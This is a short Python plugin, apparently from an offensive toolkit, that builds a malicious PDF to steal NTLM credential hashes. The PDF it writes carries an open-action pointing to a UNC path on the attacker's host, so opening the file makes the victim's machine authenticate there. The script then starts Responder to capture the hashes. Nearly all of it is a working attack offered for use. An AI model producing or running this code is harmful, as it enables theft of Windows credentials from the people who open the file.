#!/usr/bin/env python3
Description = 'Steal the NTLM hash using malicious PDF file'
from pluginsupport import *

interface = ask('interface')
lhost = ask('lhost')

def run():
	evil_code = """
%PDF-1.7
1 0 obj
<</Type/Catalog/Pages 2 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>
endobj
xref
0 4
0000000000 65535 f
0000000015 00000 n
0000000060 00000 n
0000000111 00000 n
trailer
<</Size 4/Root 1 0 R>>
startxref
190
3 0 obj
<< /Type /Page
   /Contents 4 0 R
   /AA <<
	   /O <<
	      /F (\\\\\\\\""" + init['LHOST'] + """\\\\test)
		  /D [ 0 /Fit]
		  /S /GoToE
		  >>
	   >>
	   /Parent 2 0 R
	   /Resources <<
			/Font <<
				/F1 <<
					/Type /Font
					/Subtype /Type1
					/BaseFont /Helvetica
					>>
				  >>
				>>
>>
endobj
4 0 obj<< /Length 100>>
stream
BT
/TI_0 1 Tf
14 0 0 14 10.000 753.976 Tm
0.0 0.0 0.0 rg
(PDF Document) Tj
ET
endstream
endobj
trailer
<<
	/Root 1 0 R
>>
%%EOF"""
	try:
		text("Creating PDF...")
		pdf = open("EvilPDF_Exec.pdf", "w")
		pdf.write(evil_code)
		pdf.close()
		text("Saved as: EvilPDF_Exec.pdf")
		text("Starting up responder to get hashes")
		os.system("/usr/bin/responder -I " + init['interface'] + " -wF")
	except KeyboardInterrupt:
		exit()

run()
